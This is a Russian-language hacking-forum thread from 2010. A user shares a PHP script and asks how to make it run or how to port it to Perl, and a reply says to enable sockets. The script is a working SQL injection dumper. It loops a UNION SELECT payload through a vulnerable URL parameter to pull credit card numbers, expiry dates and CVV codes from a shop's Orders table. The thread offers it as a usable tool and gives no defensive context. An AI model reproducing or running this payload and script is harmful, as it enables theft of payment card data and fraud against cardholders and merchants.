У кого есть такой скрипт на Perl?

Discussion in 'PHP' started by $r00tkit$, 12 Dec 2010.

  1. $r00tkit$

    $r00tkit$ New Member

    Joined:
    23 Jun 2010
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Вот имею скрипт на php ну на денвере он как бы не хочет работать, уже все перепробывал. Может у кого есть похожие скрипты? или может кто сможешь переделать под Perl?


    Code:
    <?php
$set['b']='121212';//Что находится перед выводиомй инфой
$set['e']='212121';//Что находится после выводимой инфы
$set['u']='http://www.site.com/index.php?id=';//URL с узвимым параметров В КОНЦЕ(!)
$set['z']='-1 UNION SELECT CONCAT(0x313231323132, payCCNumber, 0x3a, payCCExpMonth, 0x3a, payCCExpYear, 0x3a, payCVVNumber, 0x323132313231) FROM site_com.Orders LIMIT +++counter+++,1--';//Уязвимый параметр
$set['c']='+++counter+++';//Строка счетчика
$set['f']='10000';//Начальное значение счетчика
$set['s']='10100';//Конечное значение счетчика
$set['h']='localhost';//Хост

if(!empty($_GET['b']))$set['b']=$_GET['b'];
if(!empty($_GET['e']))$set['e']=$_GET['e'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['s']))$set['s']=$_GET['s'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];

for($i=$set['f'];$i<=$set['s'];$i++)
{
$zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре

//Создаем пакет
$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";

$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);

//Вырезаем необходимую инфу
$dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b']));
$dt=substr($dt,0,strpos($dt,$set['e']));

//Выводим инфу на экран
echo($dt."\r\n");
flush();
}

?>
     
    #1 $r00tkit$, 12 Dec 2010
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Сокеты включи, будет работать.
     
    #2 Tigger, 12 Dec 2010
  3. $r00tkit$

    $r00tkit$ New Member

    Joined:
    23 Jun 2010
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Проблему решил, кое что дописал, щас всё на высоте.
    Tigger, спасибо за помощь :)
     
    #3 $r00tkit$, 12 Dec 2010
    Last edited: 12 Dec 2010
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.